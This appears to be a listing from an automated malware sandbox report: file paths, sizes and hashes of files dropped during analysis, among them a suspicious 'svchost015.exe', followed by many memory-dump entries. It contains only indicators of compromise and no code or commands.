668cbabca46e5fdbbf2f75c84e8011dad69eaf76

SHA256
e2d39cbb6a9e593a4fd1c9ca538ca5734703e60985f9d070711514c5d93f512f

SHA512
14e057565c594eafcb0ca200287d4c2eecec2f98c8cf4f1025cc41566e11801b6eaa4b63d2b2ef56168760ee74e7c0413e9da90a2b1fc042a5e8a5e7228d174e

Download Submit
C:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exe

Filesize
10KB

MD5
4d17bd7716750afddff2c1bfc0b011b7

SHA1
dd471de09f14b9b2535882d616452a959ac90bac

SHA256
80214c50e4b0a6420f1ccddce315df784c3d1f7888cb1278fefed60574b7e403

SHA512
edec93099f5cb0a3b0bd601b38ce98d3e28b537e7ea0b88f3e5343d94420dd5e6a90f6e21393a5d4fbf7e72e88b1c49025a41b246e2abc9dae7478c6294d1ab8

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_it3hysec.kph.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-4UPR0.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-IB89K.tmp\Bell_Setup16.tmp

Filesize
1.4MB

MD5
68f080515fa8925d53e16820ce5c9488

SHA1
ff5a1cc48e0dcfed469e6a5e8a07cb643f58170a

SHA256
038f72a66df8456befeacc89394c29f74e1ea043812f66191fd9f0c28b035975

SHA512
f44cb0650668cfd1e1c71c968837fef42a0a07cb694cf4a7ff2cc5bdbaece319f625ae558c5ddd1990fd34ecf2cecda1f6a77687499b62c91cf9ebb2e2188a67

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir4320_366283405\21fab382-a0f9-41b4-87a7-87cbdfd78a05.tmp

Filesize
152KB

MD5
dd9bf8448d3ddcfd067967f01e8bf6d7

SHA1
d7829475b2bd6a3baa8fabfaf39af57c6439b35e

SHA256
fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

SHA512
65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

Download Submit
C:\Users\Admin\AppData\Local\Temp\svchost015.exe

Filesize
2.9MB

MD5
b826dd92d78ea2526e465a34324ebeea

SHA1
bf8a0093acfd2eb93c102e1a5745fb080575372e

SHA256
7824b50acdd144764dac7445a4067b35cf0fef619e451045ab6c1f54f5653a5b

SHA512
1ac4b731b9b31cabf3b1c43aee37206aee5326c8e786abe2ab38e031633b778f97f2d6545cf745c3066f3bd47b7aaf2ded2f9955475428100eaf271dd9aeef17

Download Submit
C:\Users\Admin\AppData\Roaming\Oracle\java_update.log

Filesize
4KB

MD5
db1bbd471f46eb033181d42e66d2fc19

SHA1
a348a0fee79314b3ff7740c3bb72073fae1d1db3

SHA256
9337f7d45feb437dcfeebb4d904efe8561de5ac6a3c0abc9a6df1210fc0a9cb2

SHA512
453115c6917b1cce3e7d673445158f5bb7ad06adb432b823359506a834991a02ff126a23f5363870d5b8641a7034eb35307843420734802f6b2467d8196f768b

Download Submit
memory/468-627-0x0000000000400000-0x000000000056C000-memory.dmp

Filesize
1.4MB

Download
memory/976-17-0x00000000060F0000-0x000000000610E000-memory.dmp

Filesize
120KB

Download
memory/976-16-0x0000000005B30000-0x0000000005E84000-memory.dmp

Filesize
3.3MB

Download
memory/976-18-0x0000000006130000-0x000000000617C000-memory.dmp

Filesize
304KB

Download
memory/976-20-0x0000000006600000-0x000000000661A000-memory.dmp

Filesize
104KB

Download
memory/976-2-0x00000000027D0000-0x0000000002806000-memory.dmp

Filesize
216KB

Download
memory/976-22-0x0000000007430000-0x00000000074C6000-memory.dmp

Filesize
600KB

Download
memory/976-23-0x00000000073C0000-0x00000000073E2000-memory.dmp

Filesize
136KB

Download
memory/976-24-0x0000000008440000-0x00000000089E4000-memory.dmp

Filesize
5.6MB

Download
memory/976-3-0x00000000053B0000-0x00000000059D8000-memory.dmp

Filesize
6.2MB

Download
memory/976-19-0x0000000007810000-0x0000000007E8A000-memory.dmp

Filesize
6.5MB

Download
memory/976-4-0x0000000005150000-0x0000000005172000-memory.dmp

Filesize
136KB

Download
memory/976-6-0x0000000005AC0000-0x0000000005B26000-memory.dmp

Filesize
408KB

Download
memory/976-5-0x0000000005A50000-0x0000000005AB6000-memory.dmp

Filesize
408KB

Download
memory/1076-523-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1076-628-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/1224-197-0x0000000000A90000-0x0000000000F4E000-memory.dmp

Filesize
4.7MB

Download
memory/1224-199-0x0000000000A90000-0x0000000000F4E000-memory.dmp

Filesize
4.7MB

Download
memory/1228-340-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/1484-1061-0x0000000000D70000-0x00000000012FB000-memory.dmp

Filesize
5.5MB

Download
memory/1988-1889-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/1988-1521-0x0000000000400000-0x00000000008AD000-memory.dmp

Filesize
4.7MB

Download
memory/2320-943-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2320-455-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2320-459-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/2320-1235-0x0000000010000000-0x000000001001C000-memory.dmp

Filesize
112KB

Download
memory/2336-526-0x0000000000400000-0x000000000056C000-memory.dmp

Filesize
1.4MB

Download
memory/2348-1049-0x0000000000D70000-0x00000000012FB000-memory.dmp

Filesize
5.5MB

Download
memory/2424-47-0x00000000001A0000-0x000000000065E000-memory.dmp

Filesize
4.7MB

Download
memory/2424-32-0x00000000001A0000-0x000000000065E000-memory.dmp

Filesize
4.7MB

Download
memory/2600-1489-0x000002BAD8BE0000-0x000002BAD8C02000-memory.dmp

Filesize
136KB

Download
memory/2980-418-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/2980-417-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/3008-784-0x00000000706A0000-0x00000000706EC000-memory.dmp

Filesize
304KB

Download
memory/3008-794-0x0000000007340000-0x00000000073E3000-memory.dmp

Filesize
652KB

Download
memory/3008-807-0x0000000007940000-0x0000000007951000-memory.dmp

Filesize
68KB

Download
memory/3280-331-0x0000000000510000-0x00000000009D9000-memory.dmp

Filesize
4.8MB

Download
memory/3280-351-0x0000000000510000-0x00000000009D9000-memory.dmp

Filesize
4.8MB

Download
memory/3596-460-0x0000000000400000-0x0000000000E0D000-memory.dmp

Filesize
10.1MB

Download
memory/3596-416-0x0000000000400000-0x0000000000E0D000-memory.dmp

Filesize
10.1MB

Download
memory/3632-860-0x0000000000400000-0x0000000000CB9000-memory.dmp

Filesize
8.7MB

Download
memory/3632-934-0x0000000000400000-0x0000000000CB9000-memory.dmp

Filesize
8.7MB

Download
memory/4112-269-0x0000000000170000-0x000000000062E000-memory.dmp

Filesize
4.7MB

Download
memory/4112-272-0x0000000000170000-0x000000000062E000-memory.dmp

Filesize
4.7MB

Download
memory/4464-1846-0x0000000000400000-0x0000000000E0D000-memory.dmp

Filesize
10.1MB

Download
memory/4464-1717-0x0000000000400000-0x0000000000E0D000-memory.dmp

Filesize
10.1MB

Download
memory/4612-428-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-367-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-432-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-948-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-366-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-424-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-423-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-422-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-405-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-402-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-380-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-375-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-374-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-872-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-941-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-884-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-883-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-886-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-889-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-937-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-905-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4612-918-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/4620-133-0x0000000007BD0000-0x0000000007BDE000-memory.dmp

Filesize
56KB

Download
memory/4620-130-0x0000000007890000-0x0000000007933000-memory.dmp

Filesize
652KB

Download
memory/4620-136-0x0000000007CD0000-0x0000000007CD8000-memory.dmp

Filesize
32KB

Download
memory/4620-135-0x0000000007CE0000-0x0000000007CFA000-memory.dmp

Filesize
104KB

Download
memory/4620-134-0x0000000007BE0000-0x0000000007BF4000-memory.dmp

Filesize
80KB

Download
memory/4620-132-0x0000000007BA0000-0x0000000007BB1000-memory.dmp

Filesize
68KB

Download
memory/4620-131-0x0000000007A00000-0x0000000007A0A000-memory.dmp

Filesize
40KB

Download
memory/4620-118-0x0000000007810000-0x0000000007842000-memory.dmp

Filesize
200KB

Download
memory/4620-119-0x00000000706A0000-0x00000000706EC000-memory.dmp

Filesize
304KB

Download
memory/4620-129-0x0000000007850000-0x000000000786E000-memory.dmp

Filesize
120KB

Download
memory/4648-107-0x0000000007C60000-0x0000000007D58000-memory.dmp

Filesize
992KB

Download
memory/4648-177-0x000000000DEA0000-0x000000000DEDC000-memory.dmp

Filesize
240KB

Download
memory/4648-106-0x0000000002CD0000-0x0000000002CD8000-memory.dmp

Filesize
32KB

Download
memory/4648-105-0x00000000079D0000-0x0000000007A62000-memory.dmp

Filesize
584KB

Download
memory/4648-103-0x0000000006670000-0x00000000066BC000-memory.dmp

Filesize
304KB

Download
memory/4648-101-0x00000000061F0000-0x0000000006544000-memory.dmp

Filesize
3.3MB

Download
memory/4648-152-0x000000000CD50000-0x000000000CEA4000-memory.dmp

Filesize
1.3MB

Download
memory/4648-172-0x000000000D4E0000-0x000000000D6A2000-memory.dmp

Filesize
1.8MB

Download
memory/4648-156-0x0000000005520000-0x000000000553A000-memory.dmp

Filesize
104KB

Download
memory/4648-158-0x000000000CFF0000-0x000000000CFFA000-memory.dmp

Filesize
40KB

Download
memory/4648-176-0x000000000DE40000-0x000000000DE52000-memory.dmp

Filesize
72KB

Download
memory/4648-171-0x000000000D250000-0x000000000D302000-memory.dmp

Filesize
712KB

Download
memory/4648-170-0x000000000D140000-0x000000000D190000-memory.dmp

Filesize
320KB

Download
memory/4648-173-0x000000000D780000-0x000000000D7CE000-memory.dmp

Filesize
312KB

Download
memory/4676-259-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4676-260-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4712-349-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4712-348-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4756-527-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4756-498-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4900-1074-0x000000006F140000-0x000000006F64E000-memory.dmp

Filesize
5.1MB

Download
memory/4964-922-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/4964-921-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/5216-1141-0x0000000000D70000-0x00000000012FB000-memory.dmp

Filesize
5.5MB

Download
memory/5276-1100-0x0000000000D70000-0x00000000012FB000-memory.dmp

Filesize
5.5MB

Download
memory/5316-1593-0x0000000000400000-0x0000000000CB9000-memory.dmp

Filesize
8.7MB

Download
memory/5316-1697-0x0000000000400000-0x0000000000CB9000-memory.dmp

Filesize
8.7MB

Download
memory/5416-935-0x0000000007000000-0x00000000070A3000-memory.dmp

Filesize
652KB

Download
memory/5416-924-0x00000000706A0000-0x00000000706EC000-memory.dmp

Filesize
304KB

Download
memory/5416-936-0x00000000074C0000-0x00000000074D1000-memory.dmp

Filesize
68KB

Download
memory/5596-1175-0x0000000000D70000-0x00000000012FB000-memory.dmp

Filesize
5.5MB

Download
memory/5680-873-0x00000000706A0000-0x00000000706EC000-memory.dmp

Filesize
304KB

Download
memory/5888-2465-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/5888-2462-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/5980-1543-0x0000018B9BD50000-0x0000018B9BD58000-memory.dmp

Filesize
32KB

Download
memory/5980-1531-0x0000018B9BBF0000-0x0000018B9BC0C000-memory.dmp

Filesize
112KB

Download
memory/5980-1538-0x0000018B9BBD0000-0x0000018B9BBDA000-memory.dmp

Filesize
40KB

Download
memory/5980-1544-0x0000018B9BD60000-0x0000018B9BD6A000-memory.dmp

Filesize
40KB

Download
memory/6112-273-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/6112-350-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/6112-178-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/6112-429-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/6112-890-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/6112-46-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/6112-79-0x0000000000070000-0x000000000052E000-memory.dmp

Filesize
4.7MB

Download
memory/7352-42153-0x00000000706A0000-0x00000000706EC000-memory.dmp

Filesize
304KB

Download
memory/7352-42193-0x0000000007690000-0x00000000076A4000-memory.dmp

Filesize
80KB

Download
memory/7352-42175-0x0000000007630000-0x0000000007641000-memory.dmp

Filesize
68KB

Download
memory/7352-42164-0x00000000073B0000-0x0000000007453000-memory.dmp

Filesize
652KB

Download
memory/17928-42250-0x00000000009A0000-0x00000000009A8000-memory.dmp

Filesize
32KB

Download
memory/18084-42240-0x0000000000400000-0x00000000004CC000-memory.dmp

Filesize
816KB

Download
memory/18084-42241-0x0000000005220000-0x0000000005296000-memory.dmp

Filesize
472KB

Download